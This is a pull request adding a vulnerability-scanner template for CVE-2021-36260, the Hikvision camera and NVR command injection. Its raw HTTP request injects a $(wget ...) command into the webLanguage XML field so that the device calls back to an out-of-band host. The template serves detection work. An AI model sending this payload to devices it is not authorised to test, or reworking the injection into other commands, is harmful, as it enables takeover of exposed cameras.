### PR TITLE
Create CVE-2021-36260.yaml

### DIFF
--- a/cves/2021/CVE-2021-36260.yaml
+++ b/cves/2021/CVE-2021-36260.yaml
@@ -1,0 +1,45 @@
+id: CVE-2021-36260
+
+info:
+  name: Hikvision IP camera/NVR - Unauthenticated Remote Code Execution
+  author: gy741
+  severity: critical
+  description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands
+  tags: cve,cve2021,rce,hikvision
+  reference: 
+    - https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
+    - https://github.com/Aiminsun/CVE-2021-36260
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2021-36260
+    cwe-id: CWE-77
+
+requests:
+  - raw:
+      - |
+        PUT /SDK/webLanguage HTTP/1.1
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Accept-Language: en-US,en;q=0.9,sv;q=0.8
+
+        <?xml version="1.0" encoding="UTF-8"?><language>$(wget http://{{interactsh-url}}>webLib/x)</language>
+
+        GET /x HTTP/1.1
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Accept-Language: en-US,en;q=0.9,sv;q=0.8
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2021-36260

```
A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands
```
- References: 
1. https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
2. https://github.com/Aiminsun/CVE-2021-36260

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO